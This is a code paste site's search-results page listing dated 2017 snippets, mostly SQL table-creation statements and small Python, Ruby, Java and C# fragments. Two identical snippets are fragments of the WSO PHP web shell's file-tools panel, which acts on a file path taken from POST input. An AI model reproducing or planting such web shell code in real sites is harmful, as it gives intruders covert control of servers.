42.7K results in 807 ms
8 years ago · Dec 11, 2017, 05:12 AM
CREATE TABLE IF NOT EXISTS `sessions` ( `sessionId` varchar(26) NOT NULL, `ipAddress` varchar(15) NOT NULL, `lifetime` int(11) NOT NULL, `data` varchar(2000) NOT NULL, PRIMARY KEY (`sessionId`) ) ENGINE=MEMORY DEFAULT CHARSET=utf8;
8 years ago · Dec 11, 2017, 03:34 AM
inquiry = array ( "USE $db_name", 'CREATE TEMPORARY TABLE ' . ($tkl_table = 'A'.time ()) . ' (a LONGBLOB)',
8 years ago · Dec 11, 2017, 01:38 AM
Create database unless it exists r.db_create(name).run unless r.db_list.run.include?(name) # Create tables table_list = r.db(name).table_list.run %w[projects].each do |table| r.db(name).table_create(table).run unless table_list.include?(table) end
8 years ago · Dec 11, 2017, 12:18 AM
mxt_info and the object table * If it does not match then we are
8 years ago · Dec 11, 2017, 12:16 AM
hour)) cursor = conn.cursor() create_tmc = "CREATE TABLE IF NOT EXISTS tmc (year int, month
8 years ago · Dec 11, 2017, 12:12 AM
hour)) cursor = conn.cursor() create_tmc = "CREATE TABLE IF NOT EXISTS tmc (year int, month
8 years ago · Dec 11, 2017, 12:02 AM
true)){ request.setAttribute("error", "You are not allowed to access " + root); } //Check if file exists else if (!f.exists()) { request.setAttribute("error",
8 years ago · Dec 10, 2017, 11:24 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Dec 10, 2017, 11:24 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Dec 10, 2017, 11:12 PM
CREATE TABLE IF NOT EXISTS `permissions` ( `name` varchar(255) NOT
8 years ago · Dec 10, 2017, 10:46 PM
name in the hash table if (ChatServer.htUsers.Contains(currUser) == true) { // 0 means not connected swSender.WriteLine("0|This username already
8 years ago · Dec 10, 2017, 10:44 PM
Return-Path) of the message. If not empty, * will be sent
8 years ago · Dec 10, 2017, 10:36 PM
their capacity for malevolence if they're not prepared for it they
8 years ago · Dec 10, 2017, 10:20 PM
sqlite3.connect('shop.db') cursor = connection.cursor() create_table = ''' CREATE TABLE IF NOT EXISTS employee ( staff_ID INTEGER PRIMARY
8 years ago · Dec 10, 2017, 09:54 PM
pracownicy.zawód = zawod); DROP TEMPORARY TABLE IF EXISTS board; CREATE TEMPORARY TABLE board(pesel varchar(11),
8 years ago · Dec 10, 2017, 08:52 PM
WHERE pracownicy.zawod=zawod1); DROP TEMPORARY TABLE IF EXISTS wynik; CREATE TEMPORARY TABLE wynik ( pesel
8 years ago · Dec 10, 2017, 08:40 PM
FROM board; DROP TEMPORARY TABLE IF EXISTS board; END; // DELIMITER ;
8 years ago · Dec 10, 2017, 08:36 PM
the temp table DROP TABLE IF EXISTS tempdb.dbo.#tempProjectDates CREATE TABLE #tempProjectDates ( ProjectID INT, MaxTransactionDate DATETIME,
Total pages: 2134